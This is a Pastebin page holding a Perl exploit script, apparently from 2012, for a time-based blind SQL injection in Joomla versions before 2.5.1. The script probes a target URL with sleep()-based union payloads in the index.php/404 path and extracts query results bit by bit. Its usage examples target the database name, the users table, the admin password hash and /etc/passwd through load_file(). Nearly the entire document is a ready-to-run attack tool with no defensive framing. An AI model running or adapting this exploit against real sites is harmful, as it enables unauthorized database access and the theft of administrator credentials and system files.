Advertisement
Guest User

p00mba251.pl

a guest
Mar 17th, 2012
12,354
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.36 KB | None | 0 0
  1.                                                                      
  2.                                                                      
  3.                                                                      
  4.                                              
  5. #!/usr/bin/perl
  6. # Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
  7. # www.securitybydefault.com
  8. # Joomla <2.5.1 time based sql injection - vuln by Colin Wong
  9. #
  10. # using sleep() and not benchmark(), change for < mysql 5.0.12
  11. #
  12. # 1.- Database name: database()
  13. # 2.- Users data table name: (change 'joomla' for database() result)
  14. #   select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
  15. # 3.- Admin password: (change zzz_users from previus sql query result)
  16. #   select password from zzzz_users limit 1
  17.  
  18.  
  19.  
  20. use strict;
  21. use LWP::UserAgent;
  22. $| = 1;
  23.  
  24.  
  25. my $url = $ARGV[0];
  26. my $wtime = $ARGV[1];
  27. my $sql = $ARGV[2];
  28.  
  29. unless ($ARGV[2]) {
  30.  print "$0 <url> <wait time> <sql>\n";
  31.  print "\texamples:\n";
  32.  print "\t get admin password:\n";
  33.  print "\t\t$0 http://host/joomla/ 3 'database()'\n";
  34.  print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
  35.  print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
  36.  print "\t get file /etc/passwd\n";
  37.  print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
  38.  exit 1;
  39. }
  40.  
  41. my ($len,$sqldata);
  42.  
  43. my $ua = LWP::UserAgent->new;
  44. $ua->timeout(60);
  45. $ua->env_proxy;
  46.  
  47. my $stime = time();
  48. my $res = $ua->get($url);
  49. my $etime = time();
  50. my $regrtt = $etime - $stime;
  51. print "rtt: $regrtt secs\n";
  52. print "vuln?: ";
  53.  
  54. my $sleep = $regrtt + $wtime;
  55. $stime = time();
  56. $res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
  57. $etime = time();
  58. my $rtt = $etime - $stime;
  59. if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
  60.  
  61.  
  62. my $lenoflen;
  63. sub len {
  64.  # length of length
  65.  for (1..5) {
  66.     my $sql=$_[0];
  67.     $stime = time();
  68.     $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
  69.     $etime = time();
  70.     my $rtt = $etime - $stime;
  71.     if ($rtt >= $regrtt + $wtime) {
  72.         $lenoflen = $_;
  73.         last;
  74.     }
  75.  }
  76.  for (1..$lenoflen) {
  77.   my $ll;
  78.   $ll=$_;
  79.   for (0..9) {
  80.     my $sql=$_[0];
  81.     $stime = time();
  82.     $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
  83.     $etime = time();
  84.     my $rtt = $etime - $stime;
  85.     if ($rtt >= $regrtt + $wtime) {
  86.         $len .= $_;
  87.     }
  88.   }
  89.  }
  90.     return $len;
  91.  
  92. }
  93.  
  94. sub data {
  95.  my $sql = $_[0];
  96.  my $len = $_[1];
  97.  my ($bit, $str, @byte);
  98.  my $high = 128;
  99.  
  100.  for (1..$len) {
  101.     my $c=8;
  102.     @byte="";
  103.     my $a=$_;
  104.     for ($bit=1;$bit<=$high;$bit*=2) {
  105.         $stime = time();
  106.         # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
  107.         $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
  108.         $etime = time();
  109.         my $rtt = $etime - $stime;
  110.         if ($rtt >= $regrtt + $wtime) {
  111.             $byte[$c]="0";
  112.         } else { $byte[$c]="1"; }
  113.     $c--;
  114.     }
  115.     $str = join("",@byte);
  116.     print pack("B*","$str");
  117.   }
  118. }
  119.  
  120. $len = len($sql);
  121. print "$sql length: $len\n";
  122. print "$sql data:\n\n";
  123. data($sql,$len);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement